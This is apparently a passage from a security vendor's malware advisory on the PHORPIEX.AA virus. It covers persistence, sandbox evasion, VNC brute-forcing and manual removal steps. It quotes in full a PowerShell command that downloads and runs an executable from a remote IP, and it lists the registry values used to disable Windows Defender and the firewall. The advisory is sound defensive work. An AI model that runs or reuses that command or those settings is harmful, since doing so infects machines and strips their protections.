Microsoft Service Driver = %Windows%\{Random numbers}\svchost.exe
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Run
Microsoft Service Driver = %Windows%\{Random numbers}\svchost.exe

(Note: %User Temp% is the current user's Temp folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Local\Temp on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).)
Other Details
This Virus terminates itself if it detects it is being run in a virtual environment.
It does the following:
- It sets the following registry entries to bypass security measures:
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
- {Malware file path and name}=%Windows%\{Random numbers}\svchost.exe:*:Microsoft Service Driver
- HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
- DisableAntiSpyware=1
- HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
- DisableBehaviorMonitoring=1
- DisableOnAccessProtection=1
- DisableScanOnRealtimeEnable=1
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center and HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc
- AntiVirusOverride=1

- It attacks the network through sending the following commands in vulnerable VNC servers:
- "cmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://88.218.16.27/{Counter}','%temp%\50399340.exe');Start-Process '%temp%\50399340.exe'"

- It attacks the network by brute-forcing vulnerable VNC servers queried through randomizing IP addresses and excluding addresses starting with 127, 172, and 192.
- It infects files and marks them with a .zero section name.
It does not proceed to its malicious routine if it detects that it is being debugged.
SOLUTION
Step 1
Trend Micro Predictive Machine Learning detects and blocks malware at the first sign of its existence, before it executes on your system. When enabled, your Trend Micro product detects this malware under the following machine learning name:
- Troj.Win32.TRX.XXPE50FFF045
Step 2
Before doing any scans, Windows 7, Windows 8, Windows 8.1, and Windows 10 users must disable System Restore to allow full scanning of their computers.
Step 3
Note that not all files, folders, and registry keys and entries are installed on your computer during this malware's/spyware's/grayware's execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.
Step 4
Restart in Safe Mode
Step 5
Delete this registry value
Important: Editing the Windows Registry incorrectly can lead to irreversible system malfunction. Please do this step only if you know how or you can ask assistance from your system administrator. Else, check this Microsoft article first before modifying your computer's registry.
- In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- Microsoft Service Driver=%Windows%\{Random numbers}\svchost.exe
- Microsoft Service Driver=%Windows%\{Random numbers}\svchost.exe
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
- Microsoft Service Driver=%Windows%\{Random numbers}\svchost.exe
- Microsoft Service Driver=%Windows%\{Random numbers}\svchost.exe
Step 6
Search and delete this file
- {Drive}:\__\DriveMgr.exe
- {Drive}:\.lnk
- {Drive}:\autorun.inf
- %Application Data%\winsvcs.txt
- %User Temp%\{Random numbers}.exe
- %Windows%\{Random numbers}\svchost.exe
Step 7
Restart in normal mode and scan your computer with your Trend Micro product for files detected as Virus.Win32.PHORPIEX.AA. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check this Knowledge Base page for more information.
Step 8
Restore this file from backup only Microsoft-related files will be restored. If this malware/grayware also deleted files related to programs that are not from Microsoft, please reinstall those programs on you computer again.
- Files in removable drives with the following extensions: .lnk, .vbs, .bat, .js, .scr, .com, .jse, .cmd, .pif, .jar, .dll, .vbe, .inf
